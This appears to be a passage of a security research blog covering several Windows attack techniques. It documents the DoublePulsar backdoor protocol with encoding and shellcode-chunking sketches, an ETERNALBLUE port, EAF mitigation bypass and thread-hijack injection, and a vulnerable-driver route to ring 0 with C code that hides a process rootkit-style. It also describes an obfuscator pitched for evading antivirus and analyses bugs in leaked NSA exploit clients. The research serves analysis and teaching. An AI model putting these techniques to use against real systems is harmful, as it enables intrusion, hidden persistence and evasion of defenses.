Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

Operations are hidden in plain sight via steganography, and Wireshark has no proper dissectors for them.

The status codes (via MultiplexID delta) are:

  • 0x10 = success
  • 0x20 = invalid parameters
  • 0x30 = allocation failure
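A scanner could read the status back with something like the following sketch. The function name and the wraparound handling are my own assumptions; the only facts taken from above are the three delta values and that MultiplexID is a 16-bit field.

```python
STATUS_CODES = {
    0x10: "success",
    0x20: "invalid parameters",
    0x30: "allocation failure",
}

def knock_status(request_mid: int, response_mid: int) -> str:
    """Map the MultiplexID delta between request and response to a status."""
    delta = (response_mid - request_mid) & 0xFFFF  # MID is a 16-bit field
    return STATUS_CODES.get(delta, "no backdoor status (delta 0x%x)" % delta)

print(knock_status(0x0041, 0x0051))  # delta 0x10
print(knock_status(0x0041, 0x0041))  # a normal server echoes the MID back
```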

The opcode list is as follows:

  • 0x23 = ping
  • 0xc8 = exec
  • 0x77 = kill

You can tell which opcode was called by using the following algorithm:

t = SMB.Trans2.Timeout
op = ((t) + (t >> 8) + (t >> 16) + (t >> 24)) & 0xff

Conversely, you can make the packet using this algorithm, where k is randomly generated:

op = 0x23
k = 0xdeadbeef
t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
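The two formulas can be checked against each other with a short round trip. This sketch just wraps them in functions (the names are mine) and keeps only the low byte of the sum when decoding, since the opcode is a single byte.

```python
def decode_opcode(timeout: int) -> int:
    """Sum the four bytes of the Timeout field and keep the low byte."""
    t = timeout
    return (t + (t >> 8) + (t >> 16) + (t >> 24)) & 0xFF

def encode_timeout(op: int, k: int) -> int:
    """Build a Timeout value whose byte sum equals op; k supplies randomness."""
    low = 0xFF & (op - ((k & 0xFFFF00) >> 16) - ((k & 0xFF00) >> 8))
    return low | (k & 0xFFFF00)

OPCODES = {"ping": 0x23, "exec": 0xC8, "kill": 0x77}

k = 0xDEADBEEF
for name, op in OPCODES.items():
    t = encode_timeout(op, k)
    print(name, hex(t), hex(decode_opcode(t)))
```

With k = 0xdeadbeef, the two middle bytes 0xad and 0xbe are carried into the timeout unchanged, and the low byte is chosen so the byte sum lands on the opcode.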

Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

The "XOR key" algorithm is:

s = SMB.Signature1
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) & 0xffffffff

More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.
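Here is a hedged sketch of what the client side of an exec request might do with the payload. It takes an already-computed 32-bit key as input. The little-endian key byte order, the function names, and the example key are assumptions for illustration; only the 4096-byte chunking and the use of XOR come from the description above.

```python
import struct

CHUNK_SIZE = 4096

def xor_stream(data: bytes, key: int) -> bytes:
    """XOR data with a repeating 4-byte key (little-endian order assumed)."""
    key_bytes = struct.pack("<I", key)
    return bytes(b ^ key_bytes[i % 4] for i, b in enumerate(data))

def chunk_payload(shellcode: bytes, key: int) -> list:
    """Encrypt the payload, then split it into 4096-byte pieces."""
    encrypted = xor_stream(shellcode, key)
    return [encrypted[i:i + CHUNK_SIZE]
            for i in range(0, len(encrypted), CHUNK_SIZE)]

key = 0x11223344            # hypothetical key, not a real captured value
payload = b"\x90" * 5000    # placeholder bytes standing in for shellcode
chunks = chunk_payload(payload, key)
print([len(c) for c in chunks])
```

Because XOR is its own inverse, running xor_stream over the reassembled chunks with the same key returns the original bytes, which is all the backdoor needs to do on its side.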

We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

And of course the full disassembly listing.

Conclusion

There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's a unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. If not, we can expect detection to be added.

Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to escalate privileges. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analogous to how usermode shellcode operates during remote exploits.

If/when this gets ported over to Metasploit, I would probably not copy this verbatim, but rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

Here's what can be done instead:

  1. Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
  2. Spawn a hidden process (such as notepad.exe).
  3. Queue an APC with Meterpreter payload.
  4. Resume process, and exit the kernel cleanly.

Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

8 June 2017 at 02:55

The whitepaper for the research done on ETERNALBLUE by @JennaMagius and me has been completed.

Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

PDF Download

Errata

r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

Here is the correct vulnerable code path for Windows 10 version 1511:

How the vulnerability was patched with MS17-010:

The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.
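To show why register width matters here, the sketch below models a size field that is updated through a 16-bit store versus a 32-bit store. The concrete numbers and the exact shape of the miscalculation are assumptions based on public write-ups of this bug, not something taken from the disassembly in this post.

```python
def update_size_16bit(stored_size: int, new_size: int) -> int:
    """16-bit store: only the low word changes, the stale high word stays."""
    return (stored_size & 0xFFFF0000) | (new_size & 0xFFFF)

def update_size_32bit(stored_size: int, new_size: int) -> int:
    """32-bit store: the whole field is replaced."""
    return new_size & 0xFFFFFFFF

stored = 0x10000  # illustrative attacker-supplied list size
actual = 0xFF5D   # illustrative size recomputed by the server

print(hex(update_size_16bit(stored, actual)))  # larger than it should be
print(hex(update_size_32bit(stored, actual)))  # the intended value
```

In this model the unpatched path ends up believing the list is bigger than the buffer sized for it, which is the kind of mismatch that leads to an overflow.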

Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

Talk/Workshop at DEF CON 25

8 June 2017 at 03:07

Just got the word that @aleph___naught and I will be presenting a talk and workshop at DEF CON 25.

Our talk is a post-exploitation RAT using the Windows Script Host. Executing completely from memory with tons of ways to fork to shellcode. Will contain some original research (with the help of @JennaMagius and @The_Naterz) and amazing prior work by @tiraniddo, @subTee, and @enigma0x3. Cue @mattifestation interjecting with something about app whitelisting!

The workshop is not just the tactics, but the code and reverse engineering behind all the stuff in penetration testing rootkits such as Meterpreter and PowerShell Empire. It will include a deep look into Windows internals and some new concepts and ideas not yet present in the normal set of tools.

All slides and code will be posted at the end of DEF CON.

Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

1 July 2017 at 07:01

Windows 10 Redstone 3 (Fall Creators Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves on to Windows 10. This is a mitigation that will need to be bypassed sooner or later.

EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports; however, Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

So how can we avoid the EAF exploit mitigation? Simple: reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.

#pragma pack(1)
typedef struct _REFLECTIVE_LOADER_INFO
{

    LPVOID  lpRealParam;
    LPVOID  lpDosHeader;
    FARPROC fLoadLibraryA;
    FARPROC fGetProcAddress;
    FARPROC fVirtualAlloc;
    FARPROC fNtFlushInstructionCache;
    FARPROC fVirtualLock;

} REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;

Instead of performing two allocations, we could also shove this information in a code cave at the start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

In order to get code execution to the point of being able to inject code in another process, you need to be inside of a valid context or previously have necessary function pointers anyways. Since EAF does not alert from a valid context, obtaining pointers in the first place should not be an issue. From there, chaining this method with migration is not a problem.

This kind of removes some of the novelty from reflective DLL injection. It's known that instead of self-loading, it's possible to perform the loader code from the injector (this method is seen in powerkatz.dll [PowerShell Empire's Mimikatz] and process hollowing). However, recently there was a circumstance where I was forced to use reflective injection due to the constraints I was working within. More on that at a later time, but reflective DLL injection, even with this extra step, still has plenty of uses and is highly coupled to the tools we're currently using... This is a simple fix when the issue comes up.

ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

1 July 2017 at 07:52

In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteProcessMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

Stage 0: Thread Hijack

Code can be found in hijack/hijack.c

  1. Select a target PID.
  2. Process is opened, and any thread is found.
  3. Thread is suspended, and thread context (CPU registers) copied.
  4. Memory allocated in remote process for reflective DLL.
  5. Memory allocated in remote process for thread context.
  6. Set the thread context stack pointer to a lower address.
  7. Change thread context with SetThreadContext().
  8. Resume the thread execution.

Stage 1: Reflective Restore

Code can be found in dll/ReflectiveDll.c

  1. Normal reflective DLL injection takes place.
  2. Optional: Spawn new thread locally for a primary payload.
  3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored the parameter in a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there are no issues in the restoration process; otherwise it would have needed a hacky code cave inserted or something.

    // retrieve CONTEXT from DOS header cave
    lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));

Another issue is we could corrupt the original thread's stack. I subtracted 0x2000 from RSP to find a new spot to spam up.

I've seen similar (but non-successful) techniques for code injection, and found only a small amount of related information [1] [2]. These techniques did not perform proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

2 July 2017 at 03:35

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings, and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

  1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
    • Local users are almost always admins.
    • UAC is known to be fundamentally broken.
  2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
    • It's a fairly obvious idea, and elementary to perform.
    • Windows does not have robust certificate revocation.
      • Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or changing the configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

— slipstream/RoL (@TheWack0lian) September 23, 2016

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

— Matt Graeber (@mattifestation) June 24, 2017

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seem bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and their list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple; doing something interesting once there is more difficult (e.g. we can already load drivers, and the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 // EPROCESS.ActiveProcessLinks offset; differs between Windows builds
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist =
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 // splice the neighbors together so list walks skip this process
 plist->Blink->Flink = plist->Flink;
 plist->Flink->Blink = plist->Blink;

 // point the orphaned entry at itself so later list operations
 // on it do not touch the neighbors it just left
 plist->Flink = plist;
 plist->Blink = plist;
}
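If the pointer juggling is hard to follow, this user-mode Python model of a circular doubly-linked list performs the same unlink. The class and helper names are invented for the example, and nothing here touches real kernel structures.

```python
class ListEntry:
    """Toy LIST_ENTRY: a node that starts out pointing at itself."""
    def __init__(self, name: str):
        self.name = name
        self.flink = self
        self.blink = self

def insert_tail(head: ListEntry, entry: ListEntry) -> None:
    entry.blink = head.blink
    entry.flink = head
    head.blink.flink = entry
    head.blink = entry

def unlink(entry: ListEntry) -> None:
    entry.blink.flink = entry.flink  # previous node now skips the entry
    entry.flink.blink = entry.blink  # next node now skips the entry
    entry.flink = entry              # orphan points at itself
    entry.blink = entry

def walk(head: ListEntry) -> list:
    names, cur = [], head.flink
    while cur is not head:
        names.append(cur.name)
        cur = cur.flink
    return names

head = ListEntry("head")
procs = [ListEntry(n) for n in ("System", "explorer.exe", "puppet.exe")]
for p in procs:
    insert_tail(head, p)

unlink(procs[2])
print(walk(head))
```

Anything that enumerates processes by walking the list from the head simply never reaches the unlinked entry.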

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Obfuscated String/Shellcode Generator - Online Tool

17 August 2017 at 08:55



Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

See also: Overflow Exploit Pattern Generator - Online Tool.

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do a similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.
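The rule about not cancelling operations can be sketched like this. It is not the tool's generator, which isn't shown here; the operation set, the function names, and the way the index is mixed in for the morph option are all my own assumptions.

```python
import random

# Each operation mapped to the operation that undoes it.
INVERSE = {"add": "sub", "sub": "add", "xor": "xor"}

def apply_op(op: str, value: int, const: int) -> int:
    if op == "add":
        return (value + const) & 0xFF
    if op == "sub":
        return (value - const) & 0xFF
    return value ^ const

def make_chain(length: int, rng: random.Random) -> list:
    """Pick random ops, rejecting any that merge with or undo the last one."""
    chain = []
    while len(chain) < length:
        op = rng.choice(list(INVERSE))
        if chain and op in (chain[-1][0], INVERSE[chain[-1][0]]):
            continue
        chain.append((op, rng.randrange(1, 256)))
    return chain

def transform(data: bytes, chain: list, morph: bool, undo: bool) -> bytes:
    steps = [(INVERSE[op], c) for op, c in reversed(chain)] if undo else chain
    out = bytearray()
    for i, b in enumerate(data):
        for op, c in steps:
            # morph mixes the byte index into the constant
            b = apply_op(op, b, (c + i) & 0xFF if morph else c)
        out.append(b)
    return bytes(out)

chain = make_chain(6, random.Random(0))
hidden = transform(b"flag{example}", chain, morph=True, undo=False)
print(transform(hidden, chain, morph=True, undo=True))
```

Without the rejection step, an ADD followed by a SUB (or two XORs in a row) would fold into a single operation and add nothing for an analyst to untangle.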

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Dissecting a Bug in the EternalRomance Client (FuzzBunch)

16 June 2018 at 09:21

Note: This post does not explain the EternalRomance exploit chain, just a quirky bug in the Equation Group's client. For comprehensive exploit details, come see my presentation at DEF CON 26 (August 2018).


Background

In SMBv1, transactions are looked up via their User ID, Tree ID, Process ID, and Multiplex ID fields (UID, TID, PID, MID). This allows a client to have many transactions running at once, as needed. UID and TID are server-assigned, and PID is client-set but usually static. Generally, a client will only use the MID, set to a random value, to distinguish distinct transactions.

Fish in a Barrel

In EternalRomance, the MID must be set to a specific value (File ID). In order for the Equation Group to multiplex multiple transactions, the PID is used instead. The PID is what separates "dynamite sticks" in the Fish-In-A-Barrel heap feng shui.

                                               
Figure 1. Fish in a Barrel (Red: Dynamite - Blue: Fish)

Dynamite are transactions that can (ideally) cause overflow into another transaction. Sometimes a dynamite stick fails, simply because memory allocations can be volatile. In this case, EternalRomance should try the next stick.

Discovering the Bug

Using WinDbg, I had nop'd out the Srv.sys vulnerability being exploited so that I could observe the network traffic during failures, among other reasons.

I noticed that EternalRomance, during the grooming phase, sent dynamite sticks with PIDs 0, 1, and 2. However, it was only attempting to ignite one PID (dynamite stick) for every execution attempt: PID 0.

This must be a mistake because igniting the same dynamite 3 times in a row does absolutely nothing but send superfluous network traffic with no change in result. A dynamite stick either works or it simply always will be a dud. And besides, why did it bother to send the other 2 dynamite in the first place?

In fact, igniting the same dynamite stick multiple times is dangerous, because it increments a pointer each time, and the offset for the overwrite (a neighboring MID) stays static. On a side note, I also noticed the first exploit attempt always tries to overwrite two bytes, and all secondary dynamite attempts only overwrite one byte. Because of the way they set up the exploit, only a one byte overwrite is necessary (though two bytes won't hurt if it hits the right place). Another peculiarity.

I messed around with the MaxExploitAttempts setting, which has a default value of 3. I set it to its maximum allowed value of 16. Now the PID started at 3?

This time, PIDs 3 through 15 were observed, and the last 3 exploit attempts sent PID=0.

The Binary is Truth

Well some debugging later, I figured out that the InitializeParameters() function (there are no symbols in the binary, but a few functions have helpful debug strings when handling error conditions) was allocating two arrays for the dynamite stick PIDs.

unsigned int size = ExploitStruct->MaxExploitAttempts_0x4360;

if (size <= 16)
{
    ExploitStruct->PidTable_0x44a0 = (PWORD) TbMalloc(2 * size);
    ExploitStruct->PidTable_0x44a4 = (PWORD) TbMalloc(2 * size);
}
else
{
    // print error message: too many max exploit attempts
}

TbMalloc is Equation Group's library function (tibe-2.dll) that just calls malloc() and then memset() to 0 (essentially calloc() but with one argument).

I set a hardware breakpoint on the tables and noticed that in SmbRemoteApiTransactionGroom() (another unnamed function) there was the following logic. This function completes when the dynamite are initially sent (before any are ignited).

if (DynamiteNum >= 3)
{
    ExploitStruct->PidTable_0x44a4[DynamiteNum - 3] = DynamitePid;
}
else
{ 
    ExploitStruct->PidTable_0x44a0[DynamiteNum] = DynamitePid;
}

Later, in DoWriteAndXExploitTransactionForRemApi(), the table where DynamiteNum >= 3 is used to source PIDs to ignite the dynamite.

This means PidTable_0x44a4 is never given values when MaxExploitAttempts=3. Observe 3 shorts set to 0 at the address in the dump.

And we can see the cause for the quirky behavior of the network traffic starting at PID=3, when MaxExploitAttempts=16 (or any greater than 3). Observe several shorts incrementing from 3, followed by three 0.

As far as I can tell, the PidTable_0x44a0 table (the one that holds the first 3 PIDs) simply isn't used, at least when tested against several versions of Windows XP and Server 2003.
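The observed traffic falls straight out of that logic. Below is a small Python model of the two tables, assuming (as the captures suggest) that dynamite PIDs are simply assigned 0, 1, 2, and so on during grooming. The function names are mine.

```python
def groom(max_attempts: int):
    """Fill the two PID tables the way the groom function does."""
    table_44a0 = [0] * max_attempts  # TbMalloc zero-fills both tables
    table_44a4 = [0] * max_attempts
    for dynamite_num in range(max_attempts):
        dynamite_pid = dynamite_num  # assumption: PIDs count up from 0
        if dynamite_num >= 3:
            table_44a4[dynamite_num - 3] = dynamite_pid
        else:
            table_44a0[dynamite_num] = dynamite_pid
    return table_44a0, table_44a4

def ignited_pids(max_attempts: int) -> list:
    """The exploit phase only sources PIDs from the second table."""
    _, table_44a4 = groom(max_attempts)
    return table_44a4

print(ignited_pids(3))
print(ignited_pids(16))
```

With the default of 3 attempts the ignition table is never written, so every attempt uses PID 0; with 16 attempts the first 13 slots hold PIDs 3 through 15 and the last 3 are still zero.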

Conclusion

This bug was probably missed, by both analysts and the Equation Group, for a few reasons:

  • Fish in a Barrel is only used for older versions of Windows (it's fixed in 7+)
  • It almost always succeeds the first time, as it is a rarely used pre-allocated heap
  • TbMalloc initializes all PIDs to 0, and the first dynamite PID is 0
  • The bug is quite subtle; I missed it several times because of assumptions

The real mystery: why is there this logic for a second table that isn't used?

Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

25 November 2018 at 01:18

See Also: Dissecting a Bug in the EternalRomance Client (FuzzBunch)

Background 

Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP from time to time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

Why did this exploit work in the wild but not against runs in my "lab"?

tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs cause FuzzBunch's XP payload to abort prematurely on single-core installs.

Multiple Exploit Chains 

Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by JennaMagius and me as well as sleepya_.

But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

Payload Methodology 

As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch's payload.

The main stages of the ring 0 shellcode perform the following actions:

  1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
  2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
  3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
  4. Runs DoublePulsar to backdoor the SMB service
  5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

Single Core Branch Anomaly 

Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.

kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

Presumably, this function will be called to clean up the semi-corrupted KPRCB.

The single-core machine did not find hal!HalInitializeProcessor... sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and setting up a ROP chain to free some memory and resume execution.

Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

Root Cause Analysis 

The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

There is an issue in the kernel shellcode: it does not take into account all of the different types of NT kernel executables that are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single-core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

The NT Red Herring 

The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

However, on single-core installations this is not a HAL import table, but instead a string table:

At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.
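The correction logic can be expressed as a short search loop. This Python sketch runs it over a fake memory map; the base address, the HAL range, and the offset where the single-core pointer lives are invented, and only 0x1040, 0xc40, and the 0x40 step come from the description above.

```python
def find_hal_pointer(read_dword, nt_base, hal_start, hal_end):
    """Return (offset, value) of the first dword that points into HAL."""
    def in_hal(value):
        return hal_start <= value < hal_end

    value = read_dword(nt_base + 0x1040)
    if in_hal(value):
        return 0x1040, value

    offset = 0x1040 - 0xC40          # fall back to 0x400
    while offset < 0x1040:           # step forward until 0x1040 again
        value = read_dword(nt_base + offset)
        if in_hal(value):
            return offset, value
        offset += 0x40
    return None

def make_reader(nt_base, contents):
    """Fake memory: offsets not listed in contents read as zero."""
    return lambda address: contents.get(address - nt_base, 0)

NT_BASE = 0x804D7000                         # hypothetical
HAL_START, HAL_END = 0x806E0000, 0x80700000  # hypothetical

multi = make_reader(NT_BASE, {0x1040: 0x806E1234})
single = make_reader(NT_BASE, {0x1040: 0x6C6C6548,  # string bytes, not a pointer
                               0x500: 0x806E5678})

print(find_hal_pointer(multi, NT_BASE, HAL_START, HAL_END))
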